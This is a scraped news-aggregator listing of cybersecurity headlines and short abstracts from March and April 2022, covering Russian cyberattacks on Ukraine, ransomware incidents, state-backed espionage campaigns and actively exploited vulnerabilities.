Microsoft Documents Over 200 Cyberattacks by Russia Against Ukraine Full Text
Abstract
At least six different Russia-aligned actors launched no less than 237 cyberattacks against Ukraine from February 23 to April 8, including 38 discrete destructive attacks that irrevocably destroyed files in hundreds of systems across dozens of organizations in the country. "Collectively, the cyber and kinetic actions work to disrupt or degrade Ukrainian government and military functions and undermine the public's trust in those same institutions," the company's Digital Security Unit (DSU) said in a special report. The major malware families that have been leveraged for destructive activity as part of Russia's relentless digital assaults include: WhisperGate , HermeticWiper ( FoxBlade aka KillDisk), HermeticRansom (SonicVote), IssacWiper (Lasainraw), CaddyWiper , DesertBlade , DoubleZero (FiberLake), and Industroyer2 . WhisperGate, HermeticWiper, IssacWiper, and CaddyWiper are all data wipers designed to overwrite data and render machines unbootThe Hacker News
April 29, 2022
Anonymous hacked Russian PSCB Commercial Bank and companies in the energy sector Full Text
Abstract
OpRussia continues, less than a week after my last update Anonymous has hacked other Russian companies and leaked their data via DDoSecrets. The #OpRussia launched by Anonymous on Russia after the criminal invasion of Ukraine continues, the collective...Security Affairs
April 28, 2022
Hundreds of Cyberattacks Launched on Ukraine - Microsoft Report Full Text
Abstract
Right before the invasion, at least six Russian distinct actors launched more than 237 attacks. All of these attacks were of destructive nature and many are still ongoing.Cyware Alerts - Hacker News
April 28, 2022
Russia-linked threat actors launched hundreds of cyberattacks on Ukraine Full Text
Abstract
Microsoft revealed that Russia launched hundreds of cyberattacks against Ukraine since the beginning of the invasion. Microsoft states that at least six separate Russia-linked threat actors launched more than 237 operations against Ukraine starting...Security Affairs
April 27, 2022
Cloudflare Thwarts Record DDoS Attack Peaking at 15 Million Requests Per Second Full Text
Abstract
Cloudflare on Wednesday disclosed that it acted to mitigate a 15.3 million request-per-second (RPS) distributed denial-of-service (DDoS) attack. The web infrastructure and website security company called it one of the "largest HTTPS DDoS attacks on record." "HTTPS DDoS attacks are more expensive in terms of required computational resources because of the higher cost of establishing a secure TLS encrypted connection," Cloudflare's Omer Yoachimik and Julien Desgats said . "Therefore it costs the attacker more to launch the attack, and for the victim to mitigate it." The volumetric DDoS attack is said to have lasted less than 15 seconds and targeted an unnamed Cloudflare customer operating a crypto launchpad. Volumetric DDoS attacks are designed to overwhelm a target network/service with significantly high volumes of malicious traffic, which typically originate from a botnet under a threat actor's control. Cloudflare said the latest attack wThe Hacker News
April 27, 2022
Chinese Hackers Targeting Russian Military Personnel with Updated PlugX Malware Full Text
Abstract
A China-linked government-sponsored threat actor observed striking European diplomatic entities in March may have been targeting Russian government officials with an updated version of a remote access trojan called PlugX . Secureworks attributed the attempted intrusions to a threat actor it tracks as Bronze President, and by the wider cybersecurity community under the monikers Mustang Panda, TA416, HoneyMyte, RedDelta, and PKPLUG. "The war in Ukraine has prompted many countries to deploy their cyber capabilities to gain insight about global events, political machinations, and motivations," the cybersecurity firm said in a report shared with The Hacker News. "This desire for situational awareness often extends to collecting intelligence from allies and 'friends.'" Bronze President, active since at least July 2018, has a history of conducting espionage operations by leveraging custom and publicly available tools to compromise, maintain long-term access,The Hacker News
April 27, 2022
Wind Turbine giant Deutsche Windtechnik hit by a professional Cyberattack Full Text
Abstract
The German wind turbine giant Deutsche Windtechnik was hit by a targeted cyberattack earlier this month. German wind turbine giant Deutsche Windtechnik announced that some of its systems were hit by a targeted professional cyberattack earlier this...Security Affairs
April 27, 2022
Microsoft says Russia hit Ukraine with hundreds of cyberattacks Full Text
Abstract
Microsoft has revealed the true scale of Russian-backed cyberattacks against Ukraine since the invasion, with hundreds of attempts from multiple Russian hacking groups targeting the country's infrastructure and Ukrainian citizens.BleepingComputer
April 27, 2022
German Wind Turbine Firm Hit by ‘Targeted, Professional Cyberattack’ Full Text
Abstract
German wind turbine giant Deutsche Windtechnik has issued a notification to warn that some of its IT systems were impacted in a targeted professional cyberattack earlier this month.Security Week
April 26, 2022
American Dental Association hit by new Black Basta ransomware Full Text
Abstract
The American Dental Association (ADA) was hit by a weekend cyberattack, causing them to shut down portions of their network while investigating the attack.BleepingComputer
April 26, 2022
North Korean Hackers Target Journalists with GOLDBACKDOOR Malware Full Text
Abstract
A state-backed threat actor with ties to the Democratic People's Republic of Korea (DRPK) has been attributed to a spear-phishing campaign targeting journalists covering the country with the ultimate goal of deploying a backdoor on infected Windows systems. The intrusions, said to be the work of Ricochet Chollima, resulted in the deployment of a novel malware strain called GOLDBACKDOOR, an artifact that shares technical overlaps with another malware named BLUELIGHT, which has been previously linked to the group. "Journalists are high-value targets for hostile governments," cybersecurity firm Stairwell said in a report published last week. "Compromising a journalist can provide access to highly-sensitive information and enable additional attacks against their sources." Ricochet Chollima, also known as APT37 , InkySquid, and ScarCruft, is a North Korean-nexus targeted intrusion adversary that has been involved in espionage attacks since at least 2016. TheThe Hacker News
April 25, 2022
Iranian Hackers Exploiting VMware RCE Bug to Deploy ‘Core Impact’ Backdoor Full Text
Abstract
An Iranian-linked threat actor known as Rocket Kitten has been observed actively exploiting a recently patched VMware vulnerability to gain initial access and deploy the Core Impact penetration testing tool on vulnerable systems. Tracked as CVE-2022-22954 (CVSS score: 9.8), the critical issue concerns a case of remote code execution (RCE) vulnerability affecting VMware Workspace ONE Access and Identity Manager. While the issue was patched by the virtualization services provider on April 6, 2022, the company cautioned users of confirmed exploitation of the flaw occurring in the wild a week later. "A malicious actor exploiting this RCE vulnerability potentially gains an unlimited attack surface," researchers from Morphisec Labs said in a new report. "This means highest privileged access into any components of the virtualized host and guest environment." Attack chains exploiting the flaw involve the distribution of a PowerShell-based stager, which is theThe Hacker News
April 22, 2022
Conti ransomware claims responsibility for the attack on Costa Rica Full Text
Abstract
Conti ransomware gang claimed responsibility for a ransomware attack that hit the government infrastructure of Costa Rica. Last week a ransomware attack has crippled the government infrastructure of Costa Rica causing chaos. The Conti ransomware...Security Affairs
April 21, 2022
Docker servers hacked in ongoing cryptomining malware campaign Full Text
Abstract
Docker APIs on Linux servers are being targeted by a large-scale Monero crypto-mining campaign from the operators of the Lemon_Duck botnet.BleepingComputer
April 21, 2022
GitHub restores popular Python repo hit by bogus DMCA takedown Full Text
Abstract
Yesterday, following a DMCA complaint, GitHub took down a repository that hosts the official SymPy project documentation website. It turns out the DMCA notice filed by HackerRank's representatives was sent out in error and generated much backlash from the open source community. The DMCA notice has since been rescinded.BleepingComputer
April 20, 2022
Russian state hackers hit Ukraine with new malware variants Full Text
Abstract
Threat analysts report the activity of the Russian state-sponsored threat group known as Gamaredon (Armageddon, Shuckworm), is still notably active in Ukrainian computer networks.BleepingComputer
April 20, 2022
Shuckworm Espionage Group Continues Pterodo Backdoor Campaign Against Ukraine Full Text
Abstract
The Russia-linked Shuckworm (aka Gamaredon) group is continually refining its malware and often deploying multiple payloads to maximize the chances of maintaining a persistent presence on targeted networks.Symantec
April 19, 2022
Attacks Against DeFi Protocols Surge Full Text
Abstract
Last year, more than $3 billion worth of digital assets were stolen. In Q1 2022, over $1.3 billion has already been stolen, indicating that the path taken by cybercriminals is even more aggressive this year.Cyware Alerts - Hacker News
April 19, 2022
Experts Uncover Spyware Attacks Against Catalan Politicians and Activists Full Text
Abstract
A previously unknown zero-click exploit in Apple's iMessage was used to install mercenary spyware from NSO Group and Candiru against at least 65 individuals as part of a "multi-year clandestine operation." "Victims included Members of the European Parliament, Catalan Presidents, legislators, jurists, and members of civil society organizations," the University of Toronto's Citizen Lab said in a new report. "Family members were also infected in some cases." Of the 65 individuals, 63 were targeted with Pegasus and four others were infected with Candiru, with iPhones belonging to at least two compromised with both. The incidents are said to have mostly occurred between 2017 and 2020. The attacks involved the weaponization of an iOS exploit dubbed HOMAGE that made it possible to penetrate the devices running versions prior to iOS 13.2, which was released on October 28, 2019. It's worth noting that the latest version of iOS is iOS 15.4.1.The Hacker News
April 19, 2022
New IcedID Malware Campaign Targets Ukrainian Government Full Text
Abstract
The targeted intrusions are a part of hostile activities against the nation since the year started. As per CERT-UA, the country has suffered 362 cyberattacks since the invasion.Cyware Alerts - Hacker News
April 18, 2022
Newly found zero-click iPhone exploit used in NSO spyware attacks Full Text
Abstract
Digital threat researchers at Citizen Lab have discovered a new zero-click iMessage exploit used to install NSO Group spyware on devices belonging to Catalan politicians, journalists, and activists.BleepingComputer
April 18, 2022
Enemybot and Fodcha - Leading the Next Waves of Botnet Attacks Full Text
Abstract
Researchers discovered Fodcha, a growing botnet that compromises over 100 victims a day. Meanwhile, FortiGuard Labs observed a new DDoS botnet dubbed Enemybot, allegedly working with Keksec. The best way to stop/avoid such attacks is to patch any exploitable vulnerabilities in your network.Cyware Alerts - Hacker News
April 17, 2022
New Hacking Campaign Targeting Ukrainian Government with IcedID Malware Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new wave of social engineering campaigns delivering IcedID malware and leveraging Zimbra exploits with the goal of stealing sensitive information. Attributing the IcedID phishing attacks to a threat cluster named UAC-0041, the agency said the infection sequence begins with an email containing a Microsoft Excel document (Мобілізаційний реєстр.xls or Mobilization Register.xls) that, when opened, prompts the users to enable macros, leading to the deployment of IcedID. The information-stealing malware , also known as BokBot, has followed a similar trajectory to that of TrickBot, Emotet, and ZLoader, evolving from its earlier roots as a banking trojan to a full-fledged crimeware service that facilities the retrieval of next-stage implants such as ransomware. The second set of targeted intrusions relate to a new threat group dubbed UAC-0097, with the email including a number of image attachments with a ContThe Hacker News
April 16, 2022
The unceasing action of Anonymous against Russia Full Text
Abstract
This week the Anonymous collective and its affiliates have targeted multiple Russian organizations stealing gigabytes of data. This week Anonymous and other hacker groups affiliated with the collective have launched multiple attacks against Russian...Security Affairs
April 16, 2022
Threat actors target the Ukrainian gov with IcedID malware Full Text
Abstract
Threat actors are targeting Ukrainian government agencies with phishing attacks delivering the IcedID malware. The Ukrainian Computer Emergency Response Team (CERT-UA) uncovered new phishing campaigns aimed at infecting systems of Ukrainian government...Security Affairs
April 15, 2022
Spanish FA report cyber attack to police after email accounts, private texts stolen Full Text
Abstract
Documents and information from email accounts, private texts, and audio conversations from top executives of the federation, including president Luis Rubiales, have been stolen in recent months.ESPN
April 15, 2022
Threat actors use Zimbra exploits to target organizations in Ukraine Full Text
Abstract
Threat actors are targeting Ukrainian government organizations with exploits for XSS vulnerabilities in Zimbra Collaboration Suite (CVE-2018-6882). Ukraine's CERT (CERT-UA) warns of threat actors that are targeting government organizations with exploits...Security Affairs
April 15, 2022
Attack on Panasonic Canada Shows Conti is Still Dangerous Full Text
Abstract
While the details remain sparse, Panasonic suffered another breach just six months after a high-profile attack—this time at Panasonic Canada. The Conti gang said it was behind the February attack that resulted in the theft of more than 2.8GB of data.Security Boulevard
April 14, 2022
Wind turbine firm Nordex hit by Conti ransomware attack Full Text
Abstract
The Conti ransomware operation has claimed responsibility for a cyberattack on wind turbine giant Nordex, which was forced to shut down IT systems and remote access to the managed turbines earlier this month.BleepingComputer
April 14, 2022
Lazarus Targets Chemical Sector Full Text
Abstract
The campaign appears to be a continuation of Lazarus activity dubbed Operation Dream Job, which was first observed in August 2020. In the past, it targeted the defense, government, and engineering sectors.Symantec
April 14, 2022
Hackers target Ukrainian govt with IcedID malware, Zimbra exploits Full Text
Abstract
Hackers are targeting Ukrainian government agencies with new attacks exploiting Zimbra exploits and phishing attacks pushing the IcedID malware.BleepingComputer
April 14, 2022
OldGremlin ransomware gang targets Russia with new malware Full Text
Abstract
OldGremlin, a little-known threat actor that uses its particularly advanced skills to run carefully prepared, sporadic campaigns, has made a comeback last month after a gap of more than one year.BleepingComputer
April 13, 2022
Industroyer2 Found Targeting Energy Sector in Ukraine Full Text
Abstract
Sandworm APT has been associated with a new Industroyer-2 malware that was used to target electric power systems in Ukraine. Besides, the Sandworm group also uses other malware families such as CaddyWiper, AwfulShred, OrcShred, and SoloShred. Organizations are suggested to follow the recommendation ... Read MoreCyware Alerts - Hacker News
April 13, 2022
African banks heavily targeted in RemcosRAT malware campaigns Full Text
Abstract
African banks are increasingly targeted by malware distribution campaigns that employ HTML smuggling tricks and typo-squatted domains to drop remote access trojans (RATs).BleepingComputer
April 13, 2022
Russian Hackers Tried Attacking Ukraine’s Power Grid with Industroyer2 Malware Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) on Tuesday disclosed that it thwarted a cyberattack by Sandworm , a hacking group affiliated with Russia's military intelligence, to sabotage the operations of an unnamed energy provider in the country. "The attackers attempted to take down several infrastructure components of their target, namely: Electrical substations, Windows-operated computing systems, Linux-operated server equipment, [and] active network equipment," The State Service of Special Communications and Information Protection of Ukraine (SSSCIP) said in a statement. Slovak cybersecurity firm ESET, which collaborated with CERT-UA to analyze the attack, said the attempted intrusion involved the use of ICS-capable malware and regular disk wipers, with the adversary unleashing an updated variant of the Industroyer malware, which was first deployed in a 2016 assault on Ukraine's power grid. "The Sandworm attackers made an attempt to dThe Hacker News
April 12, 2022
Attackers Abuse AWS Lambda to Mine Monero Full Text
Abstract
Researchers stumbled across a new malware variant, dubbed Denonia, that targets AWS Lambda, a scalable cloud computing service used by SMBs and enterprise players worldwide. It is a Go-based wrapper designed to deploy a custom XMRig crypto miner for Monero mining. Experts suggest always using ... Read MoreCyware Alerts - Hacker News
April 12, 2022
Panasonic’s Canadian Operations Suffered Ransomware Attack Full Text
Abstract
In a statement provided to TechCrunch, Panasonic said that it was a victim of a “targeted cybersecurity attack” in February that affected some of its systems, processes, and networks.Tech Crunch
April 12, 2022
Sandworm hackers fail to take down Ukrainian energy provider Full Text
Abstract
The Russian state-sponsored hacking group known as Sandworm tried on Friday to take down a large Ukrainian energy provider by disconnecting its electrical substations with a new variant of the Industroyer malware for industrial control systems (ICS) and a new version of the CaddyWiper data destruction malware.BleepingComputer
April 12, 2022
BlackCat Ransomware Group Claims Attack on Florida International University Full Text
Abstract
The ransomware group, which most recently attacked North Carolina A&T University, claimed it has stolen a range of personal information from students, teachers, and staff.The Record
April 11, 2022
Operation Bearded Barbie Aims to Catfish Israeli Officials Full Text
Abstract
AridViper APT group was found targeting high-ranking Israeli officials in a cyberespionage campaign to spy and steal data by compromising their systems and mobile devices. The attackers have created various fake Facebook profiles with fabricated identities and stolen or AI-generated images of good- ... Read MoreCyware Alerts - Hacker News
April 11, 2022
Parrot TDS: A New Web Redirect Service Full Text
Abstract
Avast laid bare an attack campaign abusing the new Parrot TDS, which has infected over 16,500 websites across different verticals, to deliver RATs via bogus browser update prompts. The campaign started in February, while the signs of Parrot activity have been traced back to October last year. Exper ... Read MoreCyware Alerts - Hacker News
April 11, 2022
Luxury fashion house Zegna confirms August ransomware attack Full Text
Abstract
The Italian luxury fashion company Ermenegildo Zegna has disclosed a ransomware incident from August 2021 that has resulted in an extensive IT systems outage.BleepingComputer
April 09, 2022
Hackers use Conti’s leaked ransomware to attack Russian companies Full Text
Abstract
A hacking group used the Conti's leaked ransomware source code to create their own ransomware to use in cyberattacks against Russian organizations.BleepingComputer
April 8, 2022
Anonymous and the IT ARMY of Ukraine continue to target Russian entities Full Text
Abstract
The popular hacking Anonymous and the IT ARMY of Ukraine continue to target Russian government entities and private businesses. This week Anonymous claimed to have hacked multiple private businesses and leaked their data through the DDoSecrets platform. The...Security Affairs
April 8, 2022
SaintBear Uses New Set of Payloads to Target Ukrainian Organizations Full Text
Abstract
Researchers found the SaintBear actors targeting Ukrainian organizations using macro-embedded documents in its latest campaign that delivers different Elephant payloads. SaintBear has been actively performing cyberespionage campaigns aimed at Ukraine since 2021. For better protection, organizations ... Read MoreCyware Alerts - Hacker News
April 8, 2022
Hamas-linked threat actors target high-profile Israeli individuals Full Text
Abstract
Hamas-linked threat actors conducted an elaborate campaign aimed at high-profile Israeli individuals employed in sensitive sectors. Researchers from Cybereason observed a sophisticated cyberespionage campaign conducted by APT-C-23 group campaigns...Security Affairs
April 07, 2022
Hamas-linked Hackers Targeting High-Ranking Israelis Using ‘Catfish’ Lures Full Text
Abstract
A threat actor with affiliations to the cyber warfare division of Hamas has been linked to an "elaborate campaign" targeting high-profile Israeli individuals employed in sensitive defense, law enforcement, and emergency services organizations. "The campaign operators use sophisticated social engineering techniques, ultimately aimed to deliver previously undocumented backdoors for Windows and Android devices," cybersecurity company Cybereason said in a Wednesday report. "The goal behind the attack was to extract sensitive information from the victims' devices for espionage purposes." The monthslong intrusions, codenamed " Operation Bearded Barbie ," have been attributed to an Arabic-speaking and politically-motivated group called Arid Viper, which operates out of the Middle East and is also known by the monikers APT-C-23 and Desert Falcon. Most recently, the threat actor was held responsible for attacks aimed at Palestinian activistsThe Hacker News
April 07, 2022
Bearded Barbie hackers catfish high ranking Israeli officials Full Text
Abstract
The Hamas-backed hacking group tracked as 'APT-C-23' was found catfishing Israeli officials working in defense, law, enforcement, and government agencies, ultimately leading to the deployment of new malware.BleepingComputer
April 6, 2022
Ukraine warns of attacks aimed at taking over Telegram accounts Full Text
Abstract
Ukraine's technical security and intelligence service warns of threat actors targeting aimed at gaining access to users' Telegram accounts. State Service of Special Communication and Information Protection (SSSCIP) of Ukraine spotted a new wave of cyber...Security Affairs
April 5, 2022
Anonymous targets the Russian Military and State Television and Radio propaganda Full Text
Abstract
Anonymous continues to support Ukraine against the Russian criminal invasion targeting the Russian military and propaganda. Anonymous leaked personal details of the Russian military stationed in Bucha where the Russian military carried out a massacre...Security Affairs
April 05, 2022
Researchers Trace Widespread Espionage Attacks Back to Chinese ‘Cicada’ Hackers Full Text
Abstract
A Chinese state-backed advanced persistent threat (APT) group known for singling out Japanese entities has been attributed to a new long-running espionage campaign targeting new geographies, suggesting a "widening" of the threat actor's targeting. The widespread intrusions, which are believed to have commenced at the earliest in mid-2021 and continued as recently as February 2022, have been tied to a group tracked as Cicada , which is also known as APT10, Stone Panda, Potassium, Bronze Riverside, or MenuPass Team. "Victims in this Cicada (aka APT10) campaign include government, legal, religious, and non-governmental organizations (NGOs) in multiple countries around the world, including in Europe, Asia, and North America," researchers from the Symantec Threat Hunter Team, part of Broadcom Software, said in a report shared with The Hacker News. "There is a strong focus on victims in the government and NGO sectors, with some of these organizations workiThe Hacker News
April 05, 2022
Microsoft detects Spring4Shell attacks across its cloud services Full Text
Abstract
Microsoft said that it's currently tracking a "low volume of exploit attempts" targeting the critical Spring4Shell (aka SpringShell) remote code execution (RCE) vulnerability across its cloud services.BleepingComputer
April 4, 2022
Brokenwire attack, how hackers can disrupt charging for electric vehicles Full Text
Abstract
Boffins devised a new attack technique, dubbed Brokenwire, against the Combined Charging System (CCS) that could potentially disrupt charging for electric vehicles. A group of researchers from the University of Oxford and Armasuisse S+T has devised...Security Affairs
April 4, 2022
Emma Sleep Company admits attack on online checkout Full Text
Abstract
Emma Sleep Company has confirmed to The Reg that it suffered a Magecart attack which enabled the cybercriminals to skim customers' credit or debit card data from its website.The Register
April 01, 2022
Russian Wiper Malware Likely Behind Recent Cyberattack on Viasat KA-SAT Modems Full Text
Abstract
The cyberattack aimed at Viasat that temporarily knocked KA-SAT modems offline on February 24, 2022, the same day Russian military forces invaded Ukraine, is believed to have been the consequence of wiper malware, according to the latest research from SentinelOne. The findings come as the U.S. telecom company disclosed that it was the target of a multifaceted and deliberate" cyberattack against its KA-SAT network, linking it to a "ground-based network intrusion by an attacker exploiting a misconfiguration in a VPN appliance to gain remote access to the trusted management segment of the KA-SAT network." Upon gaining access, the adversary issued "destructive commands" on tens of thousands of modems belonging to the satellite broadband service that "overwrote key data in flash memory on the modems, rendering the modems unable to access the network, but not permanently unusable." But SentinelOne said it uncovered a new piece of malware (named &quThe Hacker News
April 1, 2022
Anonymous targets oligarchs’ Russian businesses: Marathon Group hacked Full Text
Abstract
Anonymous continues its operations against Russia, the group announced the hack of the Russian investment firm Marathon Group. Anonymous continues to target Russian firms owned by oligarchs, yesterday the collective announced the hack of the Thozis...Security Affairs
April 01, 2022
Chinese Hackers Target VMware Horizon Servers with Log4Shell to Deploy Rootkit Full Text
Abstract
A Chinese advanced persistent threat tracked as Deep Panda has been observed exploiting the Log4Shell vulnerability in VMware Horizon servers to deploy a backdoor and a novel rootkit on infected machines with the goal of stealing sensitive data. "The nature of targeting was opportunistic insofar that multiple infections in several countries and various sectors occurred on the same dates," said Rotem Sde-Or and Eliran Voronovitch, researchers with Fortinet's FortiGuard Labs, in a report released this week. "The victims belong to the financial, academic, cosmetics, and travel industries." Deep Panda , also known by the monikers Shell Crew, KungFu Kittens, and Bronze Firestone, is said to have been active since at least 2010, with recent attacks "targeting legal firms for data exfiltration and technology providers for command-and-control infrastructure building," according to Secureworks. Cybersecurity firm CrowdStrike, which assigned the pandaThe Hacker News
March 31, 2022
Google TAG details cyber activity with regard to the invasion of Ukraine Full Text
Abstract
The Google TAG uses uncovered phishing attacks targeting Eastern European and NATO countries, including Ukraine. The Google Threat Analysis Group (TAG) provided an update about nation-state attacks related ongoing Russian invasion of Ukraine, the experts...Security Affairs
March 31, 2022
Anonymous hacked Russian Thozis Corp, but denies attacks on Rosaviatsia Full Text
Abstract
The Anonymous collective hacked the Russian investment firm Thozis Corp, but it's a mystery the attack against the Russian Civil Aviation Authority Rosaviatsia. Anonymous continues to target Russian organizations and private foreign businesses the are still...Security Affairs
March 31, 2022
Hackers Increasingly Using ‘Browser-in-the-Browser’ Technique in Ukraine Related Attacks Full Text
Abstract
A Belarusian threat actor known as Ghostwriter (aka UNC1151) has been spotted leveraging the recently disclosed browser-in-the-browser (BitB) technique as part of their credential phishing campaigns exploiting the ongoing Russo-Ukrainian conflict. The method, which masquerades as a legitimate domain by simulating a browser window within the browser, makes it possible to mount convincing social engineering campaigns. "Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites," Google's Threat Analysis Group (TAG) said in a new report, using it to siphon credentials entered by unsuspected victims to a remote server. Among other groups using the war as a lure in phishing and malware campaigns to deceive targets into opening fraudulent emails or links include Mustang Panda and Scarab as well as nation-state actors from Iran, North Korea, and RussiaThe Hacker News
March 31, 2022
Remote ‘Brokenwire’ Hack Prevents Charging of Electric Vehicles at DC Fast Chargers Full Text
Abstract
The attack targets the Combined Charging System (CCS) — a widely used DC rapid charging technology — and it interrupts the communication between the charger and the vehicle.Security Week
March 31, 2022
Anonymous hacked Russian Thozis Corp, but denies attacks on Rosaviatsia Full Text
Abstract
Anonymous continues to target Russian organizations and foreign businesses that are still operating in the country. Now, it claims to have hacked the Russian investment firm Thozis Corp, which is owned by the oligarch Zakhar Smushkin.Security Affairs
March 31, 2022
Calendly actively abused in Microsoft credentials phishing Full Text
Abstract
Phishing actors are actively abusing Calendly to kick off a clever sequence to trick targets into entering their email account credentials on the phishing page.BleepingComputer
March 30, 2022
Researchers Expose Mars Stealer Malware Campaign Using Google Ads to Spread Full Text
Abstract
A nascent information stealer called Mars has been observed in campaigns that take advantage of cracked versions of the malware to steal information stored in web browsers and cryptocurrency wallets. "Mars Stealer is being distributed via social engineering techniques, malspam campaigns, malicious software cracks, and keygens," Morphisec malware researcher Arnold Osipov said in a report published Tuesday. Based on the Oski Stealer and first discovered in June 2021, Mars Stealer is said to be constantly under development and available for sale on over 47 underground forums, darknet sites, and Telegram channels, costing only $160 for a lifetime subscription. Information stealers allow adversaries to vacuum personal information from compromised systems, including stored credentials and browser cookies, which are then sold on criminal marketplaces or used as a springboard for launching further attacks. The release of Mars Stealer last year has also been accompanied byThe Hacker News
March 30, 2022
MSHTML Flaw Exploited to Attack Russian Dissidents Full Text
Abstract
A Ukrainian-based threat actor is spearphishing Russians who are using services that have been banned by the Kremlin.Threatpost
March 30, 2022
Google: Russian phishing attacks target NATO, European military Full Text
Abstract
The Google Threat Analysis Group (TAG) says more and more threat actors are now using Russia's war in Ukraine to target Eastern European and NATO countries, including Ukraine, in phishing and malware attacks.BleepingComputer
March 30, 2022
Viasat shares details on KA-SAT satellite service cyberattack Full Text
Abstract
US satellite communications provider Viasat has shared an incident report regarding the cyberattack that affected its KA-SAT consumer-oriented satellite broadband service on February 24, the day Russia invaded Ukraine.BleepingComputer
March 30, 2022
Phishing campaign targets Russian govt dissidents with Cobalt Strike Full Text
Abstract
A new spear phishing campaign is taking place in Russia targeting dissenters with opposing views to those promoted by the state and national media about the war against Ukraine.BleepingComputer
March 30, 2022
Threat actors actively exploit recently fixed Sophos firewall bug Full Text
Abstract
Cybersecurity firm Sophos warned that the recently addressed CVE-2022-1040 flaw in Sophos Firewall is actively exploited in attacks. Sophos has recently fixed an authentication bypass vulnerability, tracked as CVE-2022-1040, that resides...Security Affairs
March 30, 2022
Lapsus$ and SolarWinds hackers both use the same old trick to bypass MFA Full Text
Abstract
One group using this technique, according to security firm Mandiant, is Cozy Bear, a band of elite hackers working for Russia’s Foreign Intelligence Service. The group also goes under the names Nobelium, APT29, and the DukesARS Technica
March 29, 2022
An Ongoing Reply-Chain Hijacking Campaign Drops IcedID Full Text
Abstract
Researchers have detected a new conversation hijacking campaign that exploits unpatched Exchange servers to deliver IcedID trojan within the energy, healthcare, pharmaceutical, and legal sectors. It’s been almost a year since the disclosure of ProxyShell vulnerabilities in Exchange servers but not ... Read MoreCyware Alerts - Hacker News
March 29, 2022
Ukrainian military internet provider suffers cyberattack Full Text
Abstract
Ukraine's state-owned telecommunications company, Ukrtelecom, which is used by the country's military, experienced a massive cyberattack on Monday.The Hill
March 29, 2022
New Hacking Campaign by Transparent Tribe Hackers Targeting Indian Officials Full Text
Abstract
A threat actor of likely Pakistani origin has been attributed to yet another campaign designed to backdoor targets of interest with a Windows-based remote access trojan named CrimsonRAT since at least June 2021. "Transparent Tribe has been a highly active APT group in the Indian subcontinent," Cisco Talos researchers said in an analysis shared with The Hacker News. "Their primary targets have been government and military personnel in Afghanistan and India. This campaign furthers this targeting and their central goal of establishing long term access for espionage." Last month, the advanced persistent threat expanded its malware toolset to compromise Android devices with a backdoor named CapraRAT that exhibits a high "degree of crossover" with CrimsonRAT. The latest set of attacks detailed by Cisco Talos involves making use of fake domains that mimic legitimate government and related organizations to deliver the malicious payloads, including a PythoThe Hacker News
March 29, 2022
Multiple E-commerce Stores Found Being Targeted Since 2020 Full Text
Abstract
Active since 2020, the campaign is a work of cybercriminal gangs from China. According to Seguranca Informatica, the campaign has targeted around 617 online stores located in Portugal, France, Spain, Italy, Chile, Mexico, Columbia, among others.Cyware Alerts - Hacker News
March 29, 2022
Hackers use modified MFA tool against Indian govt employees Full Text
Abstract
A new campaign from the hacking group tracked as APT36, aka 'Transparent Tribe' or' Mythic Leopard,' has been discovered using new custom malware and entry vectors in attacks against the Indian government.BleepingComputer
March 29, 2022
Ukrtelecom, a major mobile service and internet provider in Ukraine, foiled a “massive” cyberattack that hit its infrastructure Full Text
Abstract
Ukrtelecom, a major mobile service and internet provider in Ukraine, foiled a “massive” cyberattack that hit its infrastructure. On March 29, 2022, a massive cyber attack caused a major internet disruption across Ukraine on national provider Ukrtelecom....Security Affairs
March 29, 2022
A Large-Scale Supply Chain Attack Distributed Over 800 Malicious NPM Packages Full Text
Abstract
A threat actor dubbed " RED-LILI " has been linked to an ongoing large-scale supply chain attack campaign targeting the NPM package repository by publishing nearly 800 malicious modules. "Customarily, attackers use an anonymous disposable NPM account from which they launch their attacks," Israeli security company Checkmarx said . "As it seems this time, the attacker has fully-automated the process of NPM account creation and has opened dedicated accounts, one per package, making his new malicious packages batch harder to spot." The findings build on recent reports from JFrog and Sonatype , both of which detailed hundreds of NPM packages that leverage techniques like dependency confusion and typosquatting to target Azure, Uber, and Airbnb developers. According to a detailed analysis of RED-LILI's modus operandi, earliest evidence of anomalous activity is said to have occurred on February 23, 2022, with the cluster of malicious packages publisThe Hacker News
March 29, 2022
School of Hard Knocks: Job Fraud Threats Target University Students Full Text
Abstract
Employment fraud typically impacts individuals, and the results can be costly. According to the FBI’s Internet Crime Complaint center, the average reported loss from this type of scheme is $3,000.Proof Point
March 29, 2022
New Report on Okta Hack Reveals the Entire Episode LAPSUS$ Attack Full Text
Abstract
An independent security researcher has shared what's a detailed timeline of events that transpired as the notorious LAPSUS$ extortion gang broke into a third-party provider linked to the cyber incident at Okta in late January 2022. In a set of screenshots posted on Twitter, Bill Demirkapi published a two-page "intrusion timeline" allegedly prepared by Mandiant, the cybersecurity firm hired by Sitel to investigate the security breach. Sitel, through its acquisition of Sykes Enterprises in September 2021, is the third-party service provider that provides customer support on behalf of Okta. The authentication services provider revealed last week that on January 20, it was alerted to a new factor that was added to a Sitel customer support engineer's Okta account, an attempt that it said was successful and blocked. The incident only came to light two months later after LAPSUS$ posted screenshots on their Telegram channel as evidence of the breach on March 22. TheThe Hacker News
March 28, 2022
Oklahoma City Indian Clinic impacted by Suncrypt’s ransomware attack Full Text
Abstract
The explanation for the “technological issues” appears to be a ransomware attack by Suncrypt, who have added the clinic to their dedicated leak site. Suncrypt claims that they have acquired 350GB+ of files.Data Breaches
March 28, 2022
Attackers Use Compromised Philippine Navy Certificate to Spread Remote Access Tool Full Text
Abstract
Avast Threat Intelligence Team has found a remote access tool (RAT) actively being used in the wild in the Philippines that uses what appears to be a compromised digital certificate belonging to the Philippine Navy.Avast
March 28, 2022
‘Purple Fox’ Hackers Spotted Using New Variant of FatalRAT in Recent Malware Attacks Full Text
Abstract
The operators of the Purple Fox malware have retooled their malware arsenal with a new variant of a remote access trojan called FatalRAT, while also simultaneously upgrading their evasion mechanisms to bypass security software. "Users' machines are targeted via trojanized software packages masquerading as legitimate application installers," Trend Micro researchers said in a report published on March 25, 2022. "The installers are actively distributed online to trick users and increase the overall botnet infrastructure." The findings follow prior research from Minerva Labs that shed light on a similar modus operandi of leveraging fraudulent Telegram applications to distribute the backdoor. Other disguised software installers include WhatsApp, Adobe Flash Player, and Google Chrome. These packages act as a first-stage loader, triggering an infection sequence that leads to the deployment of a second-stage payload from a remote server and culminating in theThe Hacker News
March 28, 2022
While Twitter suspends Anonymous accounts, the group hacked VGTRK Russian Television and Radio Full Text
Abstract
